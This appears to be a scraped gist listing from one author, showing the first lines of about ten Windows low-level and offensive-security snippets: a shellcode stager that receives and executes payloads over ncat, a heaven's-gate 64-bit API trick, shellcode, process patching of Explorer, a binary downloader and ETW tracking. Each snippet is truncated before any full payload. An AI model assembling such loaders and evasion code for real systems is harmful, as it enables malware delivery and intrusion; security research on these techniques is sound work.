This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import pefile, struct, sys | |
if len(sys.argv) != 2: | |
print(f"Strip your personal compile info from Exe Files by aaaddress1@chroot.org") | |
print(f"Usage: {sys.argv[0]} [path/to/exe]") | |
sys.exit(-1) | |
# Rewrite from pefile: https://github.com/erocarrera/pefile/blob/593d094e35198dad92aaf040bef17eb800c8a373/pefile.py#L3402 | |
def mask_myRichHdr(in_pefile): | |
DANS = 0x536E6144 # 'DanS' as dword |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// iThome 2020 Demo: Signature Patcher for Explorer | |
// author: aaaddress1@chroot.org | |
#include <iostream> | |
#include <Windows.h> | |
int main() { | |
DWORD explorer_pid; | |
GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", NULL), &explorer_pid); | |
if (HANDLE token = OpenProcess(PROCESS_ALL_ACCESS, FALSE, explorer_pid)) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// VEH Montior by aaaddress1@chroot.org | |
#include <stdio.h> | |
#include <windows.h> | |
#pragma warning( disable : 4996 ) | |
LONG __stdcall TrapFilter(PEXCEPTION_POINTERS pexinf) { | |
if (pexinf->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION && ((DWORD)pexinf->ExceptionRecord->ExceptionAddress & 0x80000000)) | |
pexinf->ContextRecord->Eip = pexinf->ContextRecord->Eip ^ 0x80000000; | |
else if (pexinf->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) | |
return EXCEPTION_CONTINUE_SEARCH; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// using WinHTTP to obtain binary data (MSVC) | |
// by aaaddress1@chroot.org | |
#include <vector> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <Winhttp.h> | |
#pragma comment(lib, "winhttp") | |
using namespace std; | |
vector<char>* httpRecv(const wchar_t url[]) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// memcpy 32bit by aaaddress1@chroot.org | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <windows.h> | |
int main(void) { | |
int dummy(0x41414242); | |
char buf[8] = {0}; | |
((void(cdecl *)(DWORD, DWORD, DWORD))"\x8B\x7C\x24\x04\x8B\x74\x24\x08\x8B\x4C\x24\x0C\xF3\xA4\xC3")((size_t)buf, (size_t)&dummy, sizeof(dummy)); | |
puts(buf); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode) | |
// by aaaddress1@chroot.org | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <windows.h> | |
typedef struct _PEB_LDR_DATA64 | |
{ | |
ULONG Length; | |
BOOLEAN Initialized; | |
ULONG64 SsHandle; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// get 64 bit Windows API in pure 32 bit mode! | |
// it's necessary to disable all the compiler optimization if you're using MSVC. | |
// more detail check out ReWolf's amazing trick: blog.rewolf.pl/blog/?p=102 | |
// by aaaddress1@chroot.org | |
#include <iostream> | |
#include <stdio.h> | |
#include <windows.h> | |
// ref: raw.githubusercontent.com/rwfpl/rewolf-wow64ext/master/src/wow64ext.h | |
#include "wow64ext.h" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# x96_shellcode.py | |
# ref: gist.github.com/aaaddress1/3c0ae754f8a40024881343a085954049 | |
# by aaaddress1@chroot.org | |
''' | |
entry: | |
call $+5 | |
mov ax, cs | |
sub ax, 23h | |
je retTo32b | |
nop |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// simple stager, by aaaddress1@chroot.org | |
// using ncat to send shellcode payload, recv & execute. | |
#include <WS2tcpip.h> | |
#include <stdio.h> | |
#include <shlobj.h> | |
#include <Windows.h> | |
#include <shlwapi.h> | |
#include <winsock2.h> | |
#pragma warning(disable:4996) | |
#pragma comment(lib, "ws2_32.lib") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ETW CLR Tracker, by aaaddress1@chroot.org | |
// rewrite from post "Hiding your .NET - ETW" | |
// URL: https://blog.xpnsec.com/hiding-your-dotnet-etw/ | |
#define AssemblyDCStart_V1 155 | |
#define AssemblyLoad_V1 154 | |
#define MethodLoadVerbose_V1 143 | |
#include <windows.h> | |
#include <stdio.h> | |
#include <wbemidl.h> |
NewerOlder